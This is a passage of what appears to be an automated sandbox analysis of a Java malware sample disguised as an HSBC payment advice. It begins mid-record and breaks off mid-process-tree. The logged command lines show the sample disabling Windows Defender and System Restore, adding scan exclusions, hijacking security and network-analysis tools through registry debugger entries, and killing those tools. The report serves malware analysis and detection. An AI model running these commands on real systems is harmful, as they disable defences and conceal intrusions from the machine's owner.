memory of 1576 1056 java.exe 304 PID 1056 wrote to memory of 1576 1056 java.exe 304 PID 1576 wrote to memory of 1924 1576 cmd.exe 305 PID 1576 wrote to memory of 1924 1576 cmd.exe 305 PID 1576 wrote to memory of 1924 1576 cmd.exe 305 PID 1576 wrote to memory of 1216 1576 cmd.exe 306 PID 1576 wrote to memory of 1216 1576 cmd.exe 306 PID 1576 wrote to memory of 1216 1576 cmd.exe 306 PID 1056 wrote to memory of 2036 1056 java.exe 307 PID 1056 wrote to memory of 2036 1056 java.exe 307 PID 1056 wrote to memory of 2036 1056 java.exe 307 PID 2036 wrote to memory of 1112 2036 cmd.exe 308 PID 2036 wrote to memory of 1112 2036 cmd.exe 308 PID 2036 wrote to memory of 1112 2036 cmd.exe 308 PID 2036 wrote to memory of 2012 2036 cmd.exe 309 PID 2036 wrote to memory of 2012 2036 cmd.exe 309 PID 2036 wrote to 
memory of 2012 2036 cmd.exe 309 PID 1056 wrote to memory of 1844 1056 java.exe 310 PID 1056 wrote to memory of 1844 1056 java.exe 310 PID 1056 wrote to memory of 1844 1056 java.exe 310 PID 1844 wrote to memory of 860 1844 cmd.exe 311 PID 1844 wrote to memory of 860 1844 cmd.exe 311 PID 1844 wrote to memory of 860 1844 cmd.exe 311 PID 1844 wrote to memory of 1376 1844 cmd.exe 312 PID 1844 wrote to memory of 1376 1844 cmd.exe 312 PID 1844 wrote to memory of 1376 1844 cmd.exe 312 PID 1056 wrote to memory of 1664 1056 java.exe 313 PID 1056 wrote to memory of 1664 1056 java.exe 313 PID 1056 wrote to memory of 1664 1056 java.exe 313 PID 1664 wrote to memory of 1900 1664 cmd.exe 314 PID 1664 wrote to memory of 1900 1664 cmd.exe 314 PID 1664 wrote to memory of 1900 1664 cmd.exe 314 PID 1664 wrote to memory of 1100 1664 cmd.exe 315 PID 1664 wrote to memory of 1100 1664 cmd.exe 315 PID 1664 wrote to memory of 1100 1664 cmd.exe 315 PID 1056 wrote to memory of 660 1056 java.exe 316 PID 1056 wrote to memory of 660 1056 java.exe 316 PID 1056 wrote to memory of 660 1056 java.exe 316 PID 660 wrote to memory of 1696 660 cmd.exe 317 PID 660 wrote to memory of 1696 660 cmd.exe 317 PID 660 wrote to memory of 1696 660 cmd.exe 317 PID 660 wrote to memory of 1608 660 cmd.exe 318 PID 660 wrote to memory of 1608 660 cmd.exe 318 PID 660 wrote to memory of 1608 660 cmd.exe 318 PID 1056 wrote to memory of 536 1056 java.exe 319 PID 1056 wrote to memory of 536 1056 java.exe 319 PID 1056 wrote to memory of 536 1056 java.exe 319 PID 536 wrote to memory of 1972 536 cmd.exe 320 PID 536 wrote to memory of 1972 536 cmd.exe 320 PID 536 wrote to memory of 1972 536 cmd.exe 320 PID 536 wrote to memory of 240 536 cmd.exe 321 PID 536 wrote to memory of 240 536 cmd.exe 321 PID 536 wrote to memory of 240 536 cmd.exe 321 PID 1056 wrote to memory of 1928 1056 java.exe 322 PID 1056 wrote to memory of 1928 1056 java.exe 322 PID 1056 wrote to memory of 1928 1056 java.exe 322 PID 1928 wrote to memory of 1008 1928 
cmd.exe 323 PID 1928 wrote to memory of 1008 1928 cmd.exe 323 PID 1928 wrote to memory of 1008 1928 cmd.exe 323 PID 1928 wrote to memory of 1912 1928 cmd.exe 324 PID 1928 wrote to memory of 1912 1928 cmd.exe 324 PID 1928 wrote to memory of 1912 1928 cmd.exe 324 PID 1056 wrote to memory of 796 1056 java.exe 325 PID 1056 wrote to memory of 796 1056 java.exe 325 PID 1056 wrote to memory of 796 1056 java.exe 325 PID 796 wrote to memory of 1892 796 cmd.exe 326 PID 796 wrote to memory of 1892 796 cmd.exe 326 PID 796 wrote to memory of 1892 796 cmd.exe 326 PID 796 wrote to memory of 1808 796 cmd.exe 327 PID 796 wrote to memory of 1808 796 cmd.exe 327 PID 796 wrote to memory of 1808 796 cmd.exe 327 PID 1056 wrote to memory of 1572 1056 java.exe 328 PID 1056 wrote to memory of 1572 1056 java.exe 328 PID 1056 wrote to memory of 1572 1056 java.exe 328 PID 1056 wrote to memory of 1832 1056 java.exe 330 PID 1056 wrote to memory of 1832 1056 java.exe 330 PID 1056 wrote to memory of 1832 1056 java.exe 330 PID 1056 wrote to memory of 2020 1056 java.exe 332 PID 1056 wrote to memory of 2020 1056 java.exe 332 PID 1056 wrote to memory of 2020 1056 java.exe 332 PID 1056 wrote to memory of 376 1056 java.exe 334 PID 1056 wrote to memory of 376 1056 java.exe 334 PID 1056 wrote to memory of 376 1056 java.exe 334 PID 1056 wrote to memory of 1596 1056 java.exe 336 PID 1056 wrote to memory of 1596 1056 java.exe 336 PID 1056 wrote to memory of 1596 1056 java.exe 336 PID 1056 wrote to memory of 1840 1056 java.exe 338 PID 1056 wrote to memory of 1840 1056 java.exe 338 PID 1056 wrote to memory of 1840 1056 java.exe 338 PID 1056 wrote to memory of 1560 1056 java.exe 340 PID 1056 wrote to memory of 1560 1056 java.exe 340 PID 1056 wrote to memory of 1560 1056 java.exe 340 PID 1056 wrote to memory of 1476 1056 java.exe 342 PID 1056 wrote to memory of 1476 1056 java.exe 342 PID 1056 wrote to memory of 1476 1056 java.exe 342 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid   Process
1776  attrib.exe
1664  attrib.exe
1652  attrib.exe
1716  attrib.exe
1820  attrib.exe
1268  attrib.exe
1832  attrib.exe
1784  attrib.exe
Processes
(Indentation shows the parent/child depth of the process tree as reported by the sandbox: level 1 is the sample's java.exe, level 2 its direct children, level 3 the children of those cmd.exe instances.)

C:\Windows\system32\java.exe (PID 1056)
    cmdline: java -jar "C:\Users\Admin\AppData\Local\Temp\Payment Advice Hsbc_pdf.jar"
    - Loads dropped DLL
    - Adds Run key to start application
    - Drops desktop.ini file(s)
    - Drops file in System32 directory
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
  C:\Windows\system32\cmd.exe (PID 108)
      cmdline: cmd.exe
  C:\Windows\system32\cmd.exe (PID 908)
      cmdline: cmd.exe
      - Suspicious use of WriteProcessMemory
    C:\Windows\System32\Wbem\WMIC.exe (PID 1628)
        cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
        - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\cmd.exe (PID 1120)
      cmdline: cmd.exe
      - Suspicious use of WriteProcessMemory
    C:\Windows\System32\Wbem\WMIC.exe (PID 1112)
        cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
        - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\attrib.exe (PID 1716)
      cmdline: attrib +h C:\Users\Admin\Oracle
      - Views/modifies file attributes
  C:\Windows\system32\attrib.exe (PID 1820)
      cmdline: attrib +h +r +s C:\Users\Admin\.ntusernt.ini
      - Views/modifies file attributes
  C:\Windows\system32\attrib.exe (PID 1268)
      cmdline: attrib -s -r C:\Users\Admin\ujTBR\Desktop.ini
      - Drops desktop.ini file(s)
      - Views/modifies file attributes
  C:\Windows\system32\attrib.exe (PID 1832)
      cmdline: attrib +s +r C:\Users\Admin\ujTBR\Desktop.ini
      - Drops desktop.ini file(s)
      - Views/modifies file attributes
  C:\Windows\system32\attrib.exe (PID 1784)
      cmdline: attrib -s -r C:\Users\Admin\ujTBR
      - Views/modifies file attributes
  C:\Windows\system32\attrib.exe (PID 1776)
      cmdline: attrib +s +r C:\Users\Admin\ujTBR
      - Views/modifies file attributes
  C:\Windows\system32\attrib.exe (PID 1664)
      cmdline: attrib +h C:\Users\Admin\ujTBR
      - Views/modifies file attributes
  C:\Windows\system32\attrib.exe (PID 1652)
      cmdline: attrib +h +s +r C:\Users\Admin\ujTBR\NXtxm.class
      - Views/modifies file attributes
  C:\Windows\system32\cmd.exe (PID 1572)
      cmdline: cmd.exe
      - Suspicious use of WriteProcessMemory
    C:\Windows\system32\reg.exe (PID 1908)
        cmdline: reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    C:\Windows\system32\reg.exe (PID 1972)
        cmdline: reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1896)
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\ujTBR','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\ujTBR\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
      - Suspicious behavior: EnumeratesProcesses
  C:\Windows\System32\reg.exe (PID 1860)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  C:\Windows\System32\reg.exe (PID 1864)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
  C:\Windows\System32\taskkill.exe (PID 1920)
      cmdline: "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
      - Kills process with taskkill
  C:\Windows\System32\reg.exe (PID 1944)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  C:\Windows\System32\reg.exe (PID 1984)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  C:\Windows\System32\reg.exe (PID 2036)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
  C:\Windows\System32\reg.exe (PID 2028)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
  C:\Windows\System32\reg.exe (PID 376)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  C:\Windows\System32\reg.exe (PID 576)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
  C:\Windows\System32\reg.exe (PID 760)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  C:\Windows\System32\reg.exe (PID 2004)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  C:\Windows\System32\reg.exe (PID 1136)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  C:\Windows\System32\reg.exe (PID 1500)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  C:\Windows\System32\reg.exe (PID 860)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  C:\Windows\System32\reg.exe (PID 1076)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
  C:\Windows\System32\reg.exe (PID 112)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
  C:\Windows\System32\reg.exe (PID 1060)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  C:\Windows\System32\reg.exe (PID 1100)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  C:\Windows\System32\reg.exe (PID 1520)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
  C:\Windows\System32\reg.exe (PID 772)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  C:\Windows\System32\reg.exe (PID 1380)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  C:\Windows\System32\reg.exe (PID 1800)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  C:\Windows\System32\reg.exe (PID 1796)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  C:\Windows\System32\reg.exe (PID 1792)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  C:\Windows\System32\reg.exe (PID 1592)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  C:\Windows\System32\reg.exe (PID 1568)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  C:\Windows\System32\reg.exe (PID 1340)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  C:\Windows\System32\taskkill.exe (PID 1996)
      cmdline: "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
      - Kills process with taskkill
  C:\Windows\System32\reg.exe (PID 796)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  C:\Windows\System32\reg.exe (PID 1812)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  C:\Windows\System32\reg.exe (PID 536)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  C:\Windows\System32\reg.exe (PID 824)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  C:\Windows\System32\reg.exe (PID 1268)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  C:\Windows\System32\reg.exe (PID 1608)
      cmdline: "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  C:\Windows\system32\cmd.exe (PID 1060)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 624)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    C:\Windows\system32\reg.exe (PID 1084)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
  C:\Windows\system32\cmd.exe (PID 660)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 1928)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    C:\Windows\system32\reg.exe (PID 1380)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
  C:\Windows\system32\cmd.exe (PID 2000)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 1488)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    C:\Windows\system32\reg.exe (PID 1336)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
  C:\Windows\System32\taskkill.exe (PID 584)
      cmdline: "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
      - Kills process with taskkill
  C:\Windows\system32\cmd.exe (PID 2004)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 2020)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    C:\Windows\system32\reg.exe (PID 1612)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
  C:\Windows\system32\cmd.exe (PID 1496)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 2008)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    C:\Windows\system32\reg.exe (PID 1840)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
  C:\Windows\system32\cmd.exe (PID 1916)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 1628)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    C:\Windows\system32\reg.exe (PID 2012)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
  C:\Windows\system32\cmd.exe (PID 1804)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 1568)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    C:\Windows\system32\reg.exe (PID 744)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
  C:\Windows\system32\cmd.exe (PID 1716)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 1268)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    C:\Windows\system32\reg.exe (PID 1264)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
  C:\Windows\system32\cmd.exe (PID 1368)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 576)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    C:\Windows\system32\reg.exe (PID 1864)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
  C:\Windows\system32\cmd.exe (PID 1036)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 1988)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    C:\Windows\system32\reg.exe (PID 1944)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
  C:\Windows\System32\taskkill.exe (PID 112)
      cmdline: "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
      - Kills process with taskkill
  C:\Windows\system32\cmd.exe (PID 2044)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 2036)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    C:\Windows\system32\reg.exe (PID 2024)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
  C:\Windows\system32\cmd.exe (PID 240)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 1216)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    C:\Windows\system32\reg.exe (PID 1996)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
  C:\Windows\system32\cmd.exe (PID 1848)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 1928)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    C:\Windows\system32\reg.exe (PID 1656)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
  C:\Windows\system32\cmd.exe (PID 1100)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 748)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    C:\Windows\system32\reg.exe (PID 1952)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
  C:\Windows\system32\cmd.exe (PID 1592)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 2020)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    C:\Windows\system32\reg.exe (PID 2008)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
  C:\Windows\System32\taskkill.exe (PID 108)
      cmdline: "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
      - Kills process with taskkill
  C:\Windows\system32\cmd.exe (PID 1908)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 552)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:64
    C:\Windows\system32\reg.exe (PID 892)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Office14.PROPLUS" /reg:32
  C:\Windows\system32\cmd.exe (PID 1332)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 744)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    C:\Windows\system32\reg.exe (PID 536)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
  C:\Windows\system32\cmd.exe (PID 1264)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 1912)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    C:\Windows\system32\reg.exe (PID 2040)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
  C:\Windows\System32\taskkill.exe (PID 1644)
      cmdline: "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
      - Kills process with taskkill
  C:\Windows\system32\cmd.exe (PID 2024)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 1008)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    C:\Windows\system32\reg.exe (PID 1968)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
  C:\Windows\system32\cmd.exe (PID 860)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 1860)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:64
    C:\Windows\system32\reg.exe (PID 112)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}" /reg:32
  C:\Windows\system32\cmd.exe (PID 1380)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 1796)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    C:\Windows\system32\reg.exe (PID 1336)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
  C:\Windows\system32\cmd.exe (PID 748)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 1624)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    C:\Windows\system32\reg.exe (PID 684)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
  C:\Windows\System32\taskkill.exe (PID 1612)
      cmdline: "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
      - Kills process with taskkill
  C:\Windows\system32\cmd.exe (PID 1368)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 1520)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:64
    C:\Windows\system32\reg.exe (PID 1572)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:32
  C:\Windows\system32\cmd.exe (PID 1812)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 660)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    C:\Windows\system32\reg.exe (PID 1804)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
  C:\Windows\system32\cmd.exe (PID 1112)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 1840)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    C:\Windows\system32\reg.exe (PID 1640)
        cmdline: reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
  C:\Windows\system32\cmd.exe (PID 1664)
      cmdline: cmd.exe
    C:\Windows\system32\reg.exe (PID 552)
